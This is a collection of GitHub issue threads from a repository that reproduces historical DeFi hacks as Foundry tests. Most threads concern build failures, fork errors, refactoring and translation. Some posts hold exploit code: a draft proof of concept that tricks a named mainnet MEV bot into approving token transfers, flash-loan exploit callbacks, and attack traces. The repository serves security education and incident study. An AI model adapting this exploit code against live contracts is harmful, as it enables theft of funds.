Goal: Tech discuss, learn from each one. Group a web3 security labs. we can participate CTF, bug bounty or create a whitehat DAO, etc.
Who can join: Contributor's in this repo.

Any ideas are welcome.

Hi,

Thank you for the fantastic and comprehensive guidance over the details of Defi Hacking for good.

As captured in the title, I would like to propose if you could consider adding topics related to proxy contract.

The rationale of the proposal to include proxy contract is due to recently, there has been increasing popularity to deploy proxy contract as well as some reported incidents on upgraded implementation contract been exploited. There are quite a number of vulnerabilities could be introduced by the flow of proxy contract nonetheless including deployment, access control, upgradeability, ABI exposure, interface visibility in implementation contract etc.

For instant, one issue that I recently encountered to deal with proxied contract is to manually compare the ABI of proxy contract + contract code of proxy contract + ABI of implementation contract in order to have a complete view of ABI.

Proxy ABI->Solidity:

interface MyInterface {
    event AdminChanged(address previousAdmin, address newAdmin);
    event BeaconUpgraded(address indexed beacon);
    event ImplementationChanged(
        uint256 indexed timestamp,
        address newImplementationAddress
    );
    event Upgraded(address indexed implementation);

    fallback() external payable;

    function changeProxyAdmin(address _newAdmin) external;

    function getProxyAdmin() external view returns (address);

    function implementation() external view returns (address);

    function upgradeTo(address _newImplementation) external;

    receive() external payable;
}

Function inside (snippet) proxy contract:

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }

(snippet) ABI of implementation contract:

function transferOwnership(address newOwner) external;

How DeFi developer going to find out the true interface of transferOwnership in this case? To my best knowledge, there is no tool to help extracting ABI of proxy + function within proxy + ABI of implemetation contract. Please feel free to share with us in case you know elsewise.

With your in depth knowledge and experiences in DeFi, I trust by sharing topics mentioned above will further improve security of DeFi as you've envisioned. I sincerely hope you would consider adding proxy contract topics in the near future as well as add related tests into DeFiHackLabs.

Thank you for your attention.

I have a few questions regarding your project. It would be very helpful if you could assist me in understanding what happens behind the scenes.

Q1

How can I see the implementation of cheat codes? If it's an address on the blockchain, could you please do me a favor and send me the link to the source code?

Q2

Why should test cases fork the blockchain at a very specific block number? How did you determine the correct block number? Why might the test cases fail at the latest block number?

Thank you so much for your assistance.

Hello, I have noticed that some of the EXP files in this repository may not be as comprehensive as they could be. I would like to inquire about the preferred method for enhancing their completeness. Should I make substantial changes directly to the original EXP files (possibly involving many changes), or is it advisable to create new ones named as "exp2"?

https://github.com/SunWeb3Sec/DeFiHackLabs/blob/edeb4417bceeefdeefef4ae0b4e9bde719beb6d4/src/test/Curve_exp01.sol#L11C94-L11C94

Small renaming issue
forge test --contracts ./src/test/deus_poc.sol -vv
file is actually deus_exp.sol in test directory

Hello,

I am starting to learn this codebase and I believe it could benefit from a structural refactor.

Currently, the README contains descriptions from various exploits, in chronological order, together with foundry reproducers. The issue is that the reproducers are all on the src folder, without any ordering whatsoever.

I propose a slight change on that structure:

images
  |_ ...
academy
  |_ ...
hacks
  |_ 2024
    |_ 01
      |_ OrbitChain_exp.sol

If you agree on this refactor, I can submit a PR

Hi,

I am a Solidity learner who recently came across your onchain_debug course. I noticed that the first four articles are written in Traditional Chinese, while the subsequent 5-7 articles are in Simplified Chinese. For learners who are more comfortable with Simplified Chinese, this may pose a slight comprehension barrier.

I am eager to contribute to the course by translating the initial four articles into Simplified Chinese to make the content more accessible to a wider audience. I would like to inquire whether you welcome the submission of a Pull Request for this translation task. If you have any specific guidelines or preferences, I am open to discussion and would appreciate your guidance.

Thank you for your time and effort. I look forward to potentially contributing to the enhancement of this course.

About the Difference Between Simplified and Traditional Chinese:
Simplified Chinese and Traditional Chinese are two different writing forms of the Chinese language. Traditional Chinese characters have more complex strokes, while Simplified Chinese characters are streamlined and simplified, a result of a character simplification movement in the 1950s and 60s. Although both forms share the same linguistic foundation, they may differ in character structure, word usage, and expression conventions.

Any ideas, corrections or issues update status are welcome.
Please share in this thread. Let's make this document up-to-date.

Notion: https://wooded-meter-1d8.notion.site/0e85e02c5ed34df3855ea9f3ca40f53b?v=22e5e2c506ef4caeb40b4f78e23517ee

Component

Forge

Have you ensured that all of these are up to date?

• Foundry
• Foundryup

What version of Foundry are you on?

forge 0.2.0 (08a629a 2023-06-03T00:04:22.625130135Z)

What command(s) is the bug in?

The Foundry keeps killing the following test run:

$ forge test --contracts src/test/RES02_exp.sol -vv

Operating System

Ubuntu 22.04.2 LTS on Windows 11 with WSL2

Describe the bug

I have tried forge clean, it does not help.

I have tried adding one by one or all of following into foundry.toml but do not seem to help:

via-ir = true
memory_limit = 17179869184
gas_limit = "18446744073709551615"
optimizer = true
optimizer-runs = 10_000_000

I have also tried closing browser, monitor the memory resource (peaked around 90%) and CPU resource (peaked around 60%), nothing seem to help.

Sample screenshot of the killed:

[⠒] Compiling...
[⠢] Compiling 10 files with 0.8.19
[⠢] Solc 0.8.19 finished in 2.02s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1126:5:
     |
1126 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:825:1:
    |
825 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2073:5:
     |
2073 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:825:1:
    |
825 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2394:5:
     |
2394 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:825:1:
    |
825 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:3262:5:
     |
3262 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:825:1:
    |
825 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4682:5:
     |
4682 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:825:1:
    |
825 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/RES02_exp.sol:26:5:
   |
26 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2049:1:
     |
2049 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/RES02_exp.sol:29:5:
   |
29 |     IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2646:1:
     |
2646 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
    --> src/test/interface.sol:2659:1:
     |
2659 | interface IWBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
    --> src/test/interface.sol:2686:5:
     |
2686 |     fallback() external payable;
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (8417): Since the VM version paris, "difficulty" was replaced by "prevrandao", which now returns a random number based on the beacon chain.
  --> script/LuckyTiger_s_exp.sol:28:47:
   |
28 |         if(uint256(keccak256(abi.encodePacked(block.difficulty,block.timestamp))) % 2 == 0) {
   |                                               ^^^^^^^^^^^^^^^^

Warning (8417): Since the VM version paris, "difficulty" was replaced by "prevrandao", which now returns a random number based on the beacon chain.
  --> script/LuckyTiger_s_exp.sol:44:47:
   |
44 |         if(uint256(keccak256(abi.encodePacked(block.difficulty,block.timestamp))) % 2 == 0) {
   |                                               ^^^^^^^^^^^^^^^^

Warning (5815): Interface functions are implicitly "virtual"
   --> src/test/interface.sol:333:5:
    |
333 |     function owner() external view virtual returns (address);
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5159): "selfdestruct" has been deprecated. The underlying opcode will eventually undergo breaking changes, and its use is not recommended.
  --> src/test/RES02_exp.sol:21:9:
   |
21 |         selfdestruct(payable(msg.sender));
   |         ^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
  --> src/test/RES02_exp.sol:55:9:
   |
55 |         address(WBNB).call{value: 30000 ether}("");
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/RES02_exp.sol:98:9:
   |
98 |         address sender,
   |         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/RES02_exp.sol:99:9:
   |
99 |         uint256 baseAmount,
   |         ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/RES02_exp.sol:100:9:
    |
100 |         uint256 quoteAmount,
    |         ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/RES02_exp.sol:101:9:
    |
101 |         bytes calldata data
    |         ^^^^^^^^^^^^^^^^^^^

Killed

Do you have any idea what could be causing the kill?

Is there any way we could increase the timeout before the kill?

why my command got killed?
i'm using github codespaces

Hi, great resources thank you for the work you put in, where can I find instructional PoC in Foundary for some of these Hacks? It would be great to resource to learn from

Hey, thanks for this awesome project!

I noticed several issues preventing forge build to work:

• Missing CheatCodes in src/test/LiFi_exp.sol:

File: LiFi_exp.sol
37: contract ContractTest is DSTest {
38:     address from = address(0x00c6f2bde06967e04caaf4bf4e43717c3342680d76);
39:     address lifi = address(0x005a9fd7c39a6c488e715437d7b1f3c823d5596ed1);
40:     address exploiter = address(0x00878099f08131a18fab6bb0b4cfc6b6dae54b177e);  
+ 41:     CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);

• log_named_bool doesn't exist. Consider the following in Qubit_exp.sol:

File: Qubit_exp.sol
- 45:   emit log_named_bool("is 0 address whitelisted", IQBridgeHandler(QBridgeHandler).contractWhitelist(address(0)));
+ 45:   emit log_named_uint("is 0 address whitelisted", IQBridgeHandler(QBridgeHandler).contractWhitelist(address(0)) ? 1 : 0);

• Commented bracket in Ronin_exp.sol:

File: Ronin_exp.sol
-  43:    // https://medium.com/coinmonks/how-to-implement-gas-less-transactions-on-ethereum-9f9273d2f059  }
+ 43:     // https://medium.com/coinmonks/how-to-implement-gas-less-transactions-on-ethereum-9f9273d2f059  
+ 44:   }

Then we can get:

Compiling 73 files with 0.8.10
Solc 0.8.10 finished in 11.30s
Compiler run successful (with warnings)

In some test cases like src/test/88mph_exp.sol, you have:

contract ContractTest is DSTest {
...
}

And, in some test cases like src/test/BUNN_exp.sol, there is:

contract ContractTest is Test {
...
}

I am wondering what the difference is between these two. I have already taken a look at the forge-std library:

abstract contract Test is DSTest, Script {
}

So, can I replace DSTest with Test in the test cases?

Trying to run the test to execute the Inverse exploit solc compilation fails as most interfaces are missing in ./interfaces.sol.
Shall I fix this and make a PR or is someone already on it?

Hi guys im trying to make a poc of badc0de mev issue;
https://rekt.news/ripmevbot/

This is what i got so far...

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;

import "forge-std/Test.sol";
import "./interface.sol";

interface Structs {
    struct Val {
        uint256 value;
    }

    enum ActionType {
      Deposit,   // supply tokens
      Withdraw,  // borrow tokens
      Transfer,  // transfer balance between accounts
      Buy,       // buy an amount of some token (externally)
      Sell,      // sell an amount of some token (externally)
      Trade,     // trade tokens against another account
      Liquidate, // liquidate an undercollateralized or expiring account
      Vaporize,  // use excess tokens to zero-out a completely negative account
      Call       // send arbitrary data to an address
    }

    enum AssetDenomination {
        Wei // the amount is denominated in wei
    }

    enum AssetReference {
        Delta // the amount is given as a delta from the current value
    }

    struct AssetAmount {
        bool sign; // true if positive
        AssetDenomination denomination;
        AssetReference ref;
        uint256 value;
    }

    struct ActionArgs {
        ActionType actionType;
        uint256 accountId;
        AssetAmount amount;
        uint256 primaryMarketId;
        uint256 secondaryMarketId;
        address otherAddress;
        uint256 otherAccountId;
        bytes data;
    }

    struct Info {
        address owner;  // The address that owns the account
        uint256 number; // A nonce that allows a single address to control many accounts
    }

    struct Wei {
        bool sign; // true if positive
        uint256 value;
    }
}

interface DyDxPool is Structs {
    function getAccountWei(Info memory account, uint256 marketId) external view returns (Wei memory);
    function operate(Info[] memory, ActionArgs[] memory) external;
}

contract ContractTest is Test {
    WETH weth = WETH(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
    DyDxPool pool = DyDxPool(0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e); //this is dydx solo margin sc

    address exploiter;
    address MEVBOT = 0xbaDc0dEfAfCF6d4239BDF0b66da4D7Bd36fCF05A;
    
    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); 
    
    function setUp() public {
        exploiter = cheats.addr(31337);

        // fork mainnet at block 15625424 
        cheats.createSelectFork("mainnet", 15625424 );
    }

    function testExploit() public {
        console.log("MEV Bot balance before exploit:", weth.balanceOf(MEVBOT));
        
        Structs.Info[] memory _infos = new Structs.Info[](1);
        _infos[0] = Structs.Info({owner: address(this), number: 1});
        
        Structs.ActionArgs[] memory _args = new Structs.ActionArgs[](1);
        _args[0] = Structs.ActionArgs(
            // ActionType actionType;
            Structs.ActionType.Call,
            // uint256 accountId;
            0,
            // AssetAmount amount;
            Structs.AssetAmount(
                // bool sign; // true if positive
                false,
                // AssetDenomination denomination;
                Structs.AssetDenomination.Wei,
                // AssetReference ref;
                Structs.AssetReference.Delta,
                // uint256 value;
                0
            ),
            // uint256 primaryMarketId;
            0,
            // uint256 secondaryMarketId;
            0,
            // address otherAddress;
            MEVBOT,
            // uint256 otherAccountId;
            0,
            // bytes data;
            abi.encodeWithSignature("approve(address,uint256)", address(this), type(uint256).max)
            // go()
        );
        pool.operate(_infos, _args);
    }

    function go() internal view returns(bytes memory) {
        return abi.encode(
                0x0000000000000000000000000000000000000000000000000000000000000003,
                address(pool),
                0x0000000000000000000000000000000000000000000000000000000000000000,
                0x0000000000000000000000000000000000000000000000000000000000000000,
                0x0000000000000000000000000000000000000000000000000000000000000000,
                0x00000000000000000000000000000000000000000000000000000000000000e0,
                0x000000000000000000000000000000000000000000000beff1ceef246ef7bd1f,
                0x0000000000000000000000000000000000000000000000000000000000000001,
                0x0000000000000000000000000000000000000000000000000000000000000020,
                0x0000000000000000000000000000000000000000000000000000000000000000,
                0x0000000000000000000000000000000000000000000000000000000000000000,
                address(this),
                address(weth),
                0x00000000000000000000000000000000000000000000000000000000000000a0,
                address(this),
                0x0000000000000000000000000000000000000000000000000000000000000040,
                0x00000000000000000000000000000000000000000000000000000000000000a0,
                0x0000000000000000000000000000000000000000000000000000000000000004,
                0x4798ce5b00000000000000000000000000000000000000000000000000000000,
                0x0000000000000000000000000000000000000000000000000000000000000002,
                0x0000000000000000000000000000000000000000000000000000000000000004,
                0x0000000000000000000000000000000000000000000000000000000000000001,
                0x0000000000000000000000000000000000000000000000000000000000000001,
                0x0000000000000000000000000000000000000000000000000000000000000002,
                0x0000000000000000000000000000000000000000000000000000000000000002
            );
    }
}

Get a error when i try to reproduce BXH :

Failing tests:
Encountered 1 failing test in src/test/BXH_exp.sol:Attacker
[FAIL. Reason: BEP20: transfer amount exceeds balance] testExploit() (gas: 587988)

I find the reason is the “deposit()” function in flashloanCall does not execute as expected by function trace， but i dont how to fix it

What you guys are doing for the Web3 security community is fantastic, reproducing all DeFi hacks with Foundry. However, I wish I could go through all of them and reproduce them myself. It's a bit overwhelming to read the POCs of the attacks without clear comments indicating what each line does, whether the attack is on a fork or just a testnet. Thanks again for your commitment, but please consider adding comments to make it easier to understand.

Consider the following snippet from src/test/LiFi_exp.sol:

address lifi = address(0x005a9fd7c39a6c488e715437d7b1f3c823d5596ed1);

When I search the given address i.e. 0x005a9fd7c39a6c488e715437d7b1f3c823d5596ed1 on etherscan.io, nothing found! Why?
If this address doesn't exist on the blockchain, how the test case passes successfully?

The FortressLoans exploit does not compile on the main branch, and will be removed as part of #622.

This issue is a request for contributors to fix that contract and add it back to the repository.

https://github.com/SunWeb3Sec/DeFiHackLabs/blob/main/src/test/grok_exp.sol

Running 1 test for src/test/grok_exp.sol:ContractTest
[FAIL. Reason: EvmError: Revert] testExpolit() (gas: 8660281895700906382)
Logs:
  attaker balance before attack:: 0.000000000000000000

Traces:
  [8660281895700906382] ContractTest::testExpolit()
    ├─ [2534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [2444] WETH::decimals() [staticcall]
    │   └─ ← 0x0000000000000000000000000000000000000000000000000000000000000012
    ├─ emit log_named_decimal_uint(key: attaker balance before attack:, val: 0, decimals: 18)
    ├─ [8660281895700888014] 0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 30000000000000000000 [3e19], 0x00)
    │   ├─ [2534] 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0::balanceOf(0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa) [staticcall]
    │   │   └─ ← 0x000000000000000000000000000000000000000000000194948decbd3a9dbeba
    │   ├─ [2534] WETH::balanceOf(0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa) [staticcall]
    │   │   └─ ← 0x0000000000000000000000000000000000000000000000cfa2e42703ab1d8964
    │   ├─ [25962] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 30000000000000000000 [3e19])
    │   │   ├─ emit Transfer(from: 0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 30000000000000000000 [3e19])
    │   │   └─ ← 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ [8660281895700842691] ContractTest::uniswapV3FlashCallback(0, 3000000000000000 [3e15], 0x00)
    │   │   ├─ [8660281895700836567] 0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 63433590767572373 [6.343e16], 0, 0x00)
    │   │   │   ├─ [39] GROK::balanceOf(0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B) [staticcall]
    │   │   │   │   └─ ← EvmError: NotActivated
    │   │   │   └─ ← EvmError: Revert
    │   │   └─ ← EvmError: Revert
    │   └─ ← EvmError: Revert
    └─ ← EvmError: Revert

Test result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 2.97s

Ran 1 test suites: 0 tests passed, 1 failed, 0 skipped (1 total tests)

Failing tests:
Encountered 1 failing test in src/test/grok_exp.sol:ContractTest
[FAIL. Reason: EvmError: Revert] testExpolit() (gas: 8660281895700906382)

Encountered a total of 1 failing tests, 0 tests succeeded

When you run forge build, the compilation fails with the following error:

Error (2333): Identifier already declared.
  --> src/test/Cellframe_exp.sol:15:1:
   |
15 | interface IPancakeV3Pool {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The previous declaration is here:
 --> src/test/Cellframe_exp.sol:5:1:
  |
5 | import "./interface.sol";
  | ^^^^^^^^^^^^^^^^^^^^^^^^^

As per the error message itself, src/test/Cellframe_exp.sol tries to define an interface IPancakeV3Pool which is already defined and imported via import "./interface.sol";

The Poc here: https://github.com/SunWeb3Sec/DeFiHackLabs/blob/main/src/test/HundredFinance_2_exp.sol is not working currently with the latest version of Foundry.

Running it with forge test -vvv

Got error:

ERROR sharedbackend: Failed to send/recv `basic` err=GetAccount(0x0000000000000000000000000000000000000000, 
(code: -32000, message: missing trie node 7887fc47300c36f531168e38613b85a3a5d30ef0f9fa6f36cb6d67978630e8b9 (path ), data: None)) address=0x0000000000000000000000000000000000000000
The application panicked (crashed).
Message:  called `Option::unwrap()` on a `None` value

[FAIL. Reason: Setup failed: Invalid data] setUp() (gas: 0)

I read this PoC https://github.com/SunWeb3Sec/DeFiHackLabs/blob/main/src/test/NewFreeDAO_exp.sol.

And then I run it in the foundry, but the test fails, the output is an EVM error revert.

│ └─ ← ()
└─ ← "EvmError: Revert"
Test result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 797.42ms
Ran 1 test suites: 0 tests passed, 1 failed, 0 skipped (1 total tests)
Failing tests:
Encountered 1 failing test in test/09.NewFreeDAO/test.sol:Attacker
[FAIL. Reason: EvmError: Revert] testExploit() (gas: 41601173)
Encountered a total of 1 failing tests, 0 tests succeeded

when i test it, once is enough

https://github.com/SunWeb3Sec/DeFiHackLabs/blob/main/src/test/GDS_exp.sol#L104

 function executeOperation(
        address pool,
        address token,
        uint256 amount,
        uint256 fee,
        bytes calldata params
    ) external{
        DODOFLashLoan();
        USDT.transfer(address(swapFlashLoan), SwapFlashLoanAmount * 10000 / 9992 + 1000);
    }

    function DODOFLashLoan() internal{
        dodoFlashLoanAmount = USDT.balanceOf(dodo);
        DVM(dodo).flashLoan(0, dodoFlashLoanAmount, address(this), new bytes(1));
    }

    function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external{
        USDTToGDS(600_000 * 1e18);
        GDSUSDTAddLiquidity(USDT.balanceOf(address(this)), GDS.balanceOf(address(this)));
        WithdrawRewardFactory();
        GDSUSDTRemovLiquidity();
        GDSToUSDT();
        USDT.transfer(dodo, dodoFlashLoanAmount);
    }

change like this

 function executeOperation(
        address pool,
        address token,
        uint256 amount,
        uint256 fee,
        bytes calldata params
    ) external{
        USDTToGDS(600_000 * 1e18);
        GDSUSDTAddLiquidity(USDT.balanceOf(address(this)), GDS.balanceOf(address(this)));
        WithdrawRewardFactory();
        GDSUSDTRemovLiquidity();
        GDSToUSDT();
        USDT.transfer(address(swapFlashLoan), SwapFlashLoanAmount * 10000 / 9992 + 1000);
    }

Experiencing the following error on the above added exploit;

2022-08-09T09:16:05.166703Z ERROR forge::runner: setUp failed reason="EvmError: Revert" contract=0xb4c79dab8f259c7aee6e5b2aa729821864227e84

The last isOwner call should have returned false, but instead I still see my contract's address after the wallet library is destroyed. Am I doing something wrong?

We need a volunteer help to move Pocs from others/ to specific yyy-mm folder.

Any ideas, corrections or issues fixed are welcome.
Please share in this thread. Let's make this document up-to-date.